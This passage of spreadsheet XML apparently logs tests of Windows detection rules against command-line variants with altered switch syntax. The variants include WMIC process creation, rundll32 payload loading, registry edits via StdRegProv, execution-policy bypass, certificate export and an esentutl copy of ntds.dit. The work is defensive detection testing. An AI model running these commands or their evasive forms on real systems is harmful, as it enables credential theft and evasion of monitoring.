      <c r="E4182" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -"node:127.0.0.1" process list</t>
        </is>
      </c>
      <c r="F4182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4182" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4182" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4182" s="43" t="n"/>
      <c r="K4182" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4183" ht="15.75" customHeight="1" s="42">
      <c r="A4183" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4183" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4183" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4183" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4183" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /noDe:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F4183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4183" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4183" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4183" s="43" t="n"/>
      <c r="K4183" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4184" ht="15.75" customHeight="1" s="42">
      <c r="A4184" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4184" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4184" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4184" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4184" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /nodE:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F4184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4184" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4184" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4184" s="43" t="n"/>
      <c r="K4184" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4185" ht="15.75" customHeight="1" s="42">
      <c r="A4185" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4185" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4185" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4185" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4185" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /node:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F4185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4185" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4185" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4185" s="43" t="n"/>
      <c r="K4185" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4186" ht="15.75" customHeight="1" s="42">
      <c r="A4186" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4186" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4186" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4186" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4186" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /NODE:127.0.0.1 process list</t>
        </is>
      </c>
      <c r="F4186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4186" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4186" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4186" s="43" t="n"/>
      <c r="K4186" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4187" ht="15.75" customHeight="1" s="42">
      <c r="A4187" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4187" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4187" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4187" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4187" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -"node:127.0.1" process list</t>
        </is>
      </c>
      <c r="F4187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4187" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4187" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4187" s="43" t="n"/>
      <c r="K4187" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4188" ht="15.75" customHeight="1" s="42">
      <c r="A4188" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4188" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4188" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4188" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4188" s="43" t="inlineStr">
        <is>
          <t>wmic.exe /"node:127.0.1" process list</t>
        </is>
      </c>
      <c r="F4188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4188" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4188" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4188" s="43" t="n"/>
      <c r="K4188" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4189" ht="15.75" customHeight="1" s="42">
      <c r="A4189" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4189" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_remote_execution</t>
        </is>
      </c>
      <c r="C4189" s="43" t="inlineStr">
        <is>
          <t>WMIC Remote Command Execution</t>
        </is>
      </c>
      <c r="D4189" s="43" t="inlineStr">
        <is>
          <t>7773b877-5abb-4a3e-b9c9-fd0369b59b00</t>
        </is>
      </c>
      <c r="E4189" s="43" t="inlineStr">
        <is>
          <t>wmic.exe -"node:::1" process list</t>
        </is>
      </c>
      <c r="F4189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4189" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4189" s="43" t="inlineStr">
        <is>
          <t>Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J4189" s="43" t="n"/>
      <c r="K4189" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4190" ht="15.75" customHeight="1" s="42">
      <c r="A4190" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4190" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C4190" s="43" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4190" s="43" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E4190" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F4190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4190" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4190" s="43" t="n"/>
      <c r="J4190" s="43" t="n"/>
      <c r="K4190" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4191" ht="15.75" customHeight="1" s="42">
      <c r="A4191" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4191" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_service_manipulation</t>
        </is>
      </c>
      <c r="C4191" s="43" t="inlineStr">
        <is>
          <t>Service Started/Stopped Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4191" s="43" t="inlineStr">
        <is>
          <t>0b7163dc-7eee-4960-af17-c0cd517f92da</t>
        </is>
      </c>
      <c r="E4191" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Start-Service -Name 'wuauserv'"</t>
        </is>
      </c>
      <c r="F4191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4191" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4191" s="43" t="n"/>
      <c r="J4191" s="43" t="n"/>
      <c r="K4191" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4192" ht="15.75" customHeight="1" s="42">
      <c r="A4192" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4192" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4192" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4192" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4192" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4192" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4192" s="43" t="n"/>
      <c r="J4192" s="43" t="n"/>
      <c r="K4192" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4193" ht="15.75" customHeight="1" s="42">
      <c r="A4193" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4193" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4193" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4193" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4193" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4193" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4193" s="43" t="n"/>
      <c r="J4193" s="43" t="n"/>
      <c r="K4193" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4194" ht="15.75" customHeight="1" s="42">
      <c r="A4194" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4194" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4194" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4194" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4194" s="43" t="inlineStr">
        <is>
          <t>powershell -Nop -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4194" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4194" s="43" t="n"/>
      <c r="J4194" s="43" t="n"/>
      <c r="K4194" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4195" ht="15.75" customHeight="1" s="42">
      <c r="A4195" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4195" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4195" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4195" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4195" s="43" t="inlineStr">
        <is>
          <t>powershell /"nop" -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4195" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4195" s="43" t="n"/>
      <c r="J4195" s="43" t="n"/>
      <c r="K4195" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4196" ht="15.75" customHeight="1" s="42">
      <c r="A4196" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4196" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4196" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4196" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4196" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -c "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4196" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4196" s="43" t="n"/>
      <c r="J4196" s="43" t="n"/>
      <c r="K4196" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4197" ht="15.75" customHeight="1" s="42">
      <c r="A4197" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4197" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4197" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4197" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4197" s="43" t="inlineStr">
        <is>
          <t>powershell -NoProfile /"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4197" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4197" s="43" t="n"/>
      <c r="J4197" s="43" t="n"/>
      <c r="K4197" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4198" ht="15.75" customHeight="1" s="42">
      <c r="A4198" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4198" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4198" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4198" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4198" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" /"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4198" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4198" s="43" t="n"/>
      <c r="J4198" s="43" t="n"/>
      <c r="K4198" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4199" ht="15.75" customHeight="1" s="42">
      <c r="A4199" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4199" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C4199" s="43" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D4199" s="43" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E4199" s="43" t="inlineStr">
        <is>
          <t>powershell -"nop" -"c" "([wmiclass]'ROOT\default:StdRegProv').CreateKey(2147483650,'Software\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F4199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4199" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4199" s="43" t="n"/>
      <c r="J4199" s="43" t="n"/>
      <c r="K4199" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4200" ht="15.75" customHeight="1" s="42">
      <c r="A4200" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4200" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C4200" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D4200" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E4200" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F4200" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4200" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4200" s="43" t="n"/>
      <c r="J4200" s="43" t="n"/>
      <c r="K4200" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4201" ht="15.75" customHeight="1" s="42">
      <c r="A4201" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4201" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4201" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4201" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4201" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4201" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4201" s="43" t="n"/>
      <c r="J4201" s="43" t="n"/>
      <c r="K4201" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4202" ht="15.75" customHeight="1" s="42">
      <c r="A4202" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4202" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4202" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4202" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4202" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$cmd = 'Export-' + 'PfxCertificate'; &amp; $cmd -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4202" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4202" s="43" t="n"/>
      <c r="J4202" s="43" t="n"/>
      <c r="K4202" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4203" ht="15.75" customHeight="1" s="42">
      <c r="A4203" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4203" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4203" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4203" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4203" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4203" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4203" s="43" t="n"/>
      <c r="J4203" s="43" t="n"/>
      <c r="K4203" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4204" ht="15.75" customHeight="1" s="42">
      <c r="A4204" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4204" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4204" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4204" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4204" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; 'Export-PfxCertificate' -Cert $cert -FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4204" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4204" s="43" t="n"/>
      <c r="J4204" s="43" t="n"/>
      <c r="K4204" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4205" ht="15.75" customHeight="1" s="42">
      <c r="A4205" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4205" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4205" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4205" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4205" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4205" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4205" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4205" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J4205" s="43" t="n"/>
      <c r="K4205" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4206" ht="15.75" customHeight="1" s="42">
      <c r="A4206" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4206" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_export_certificate</t>
        </is>
      </c>
      <c r="C4206" s="43" t="inlineStr">
        <is>
          <t>Certificate Exported Via PowerShell</t>
        </is>
      </c>
      <c r="D4206" s="43" t="inlineStr">
        <is>
          <t>9e716b33-63b2-46da-86a4-bd3c3b9b5dfb</t>
        </is>
      </c>
      <c r="E4206" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-ChildItem -Path Cert:\CurrentUser\My | Export-PfxCertificatet-FilePath C:\temp\cert.pfx"</t>
        </is>
      </c>
      <c r="F4206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4206" s="43" t="inlineStr">
        <is>
          <t>Private Keys Reconnaissance Via CommandLine Tools (213d6a77-3d55-4ce8-ba74-fcfef741974e)</t>
        </is>
      </c>
      <c r="J4206" s="43" t="n"/>
      <c r="K4206" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4207" ht="15.75" customHeight="1" s="42">
      <c r="A4207" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4207" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4207" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4207" s="43" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4207" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:127.0.0.1 "process" "call" "create" "rundll32.exe "C:\AtomicRedTeam\atomics\..\ExternalPayloads\calc.dll" StartW"</t>
        </is>
      </c>
      <c r="F4207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4207" s="43" t="inlineStr">
        <is>
          <t>New Process Created Via Wmic.EXE (526be59f-a573-4eea-b5f7-f0973207634d)</t>
        </is>
      </c>
      <c r="J4207" s="43" t="n"/>
      <c r="K4207" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4208" ht="15.75" customHeight="1" s="42">
      <c r="A4208" s="43" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B4208" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_process_creation</t>
        </is>
      </c>
      <c r="C4208" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D4208" s="43" t="inlineStr">
        <is>
          <t>3c89a1e8-0fba-449e-8f1b-8409d6267ec8</t>
        </is>
      </c>
      <c r="E4208" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c wmic /node:"localhost" process call create "cmd.ex"e /c esentutl.exe /y /vss c:\windows
tds
tds.dit /d c:
tds.dit"</t>
        </is>
      </c>
      <c r="F4208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4208" s="43" t="inlineStr">
        <is>
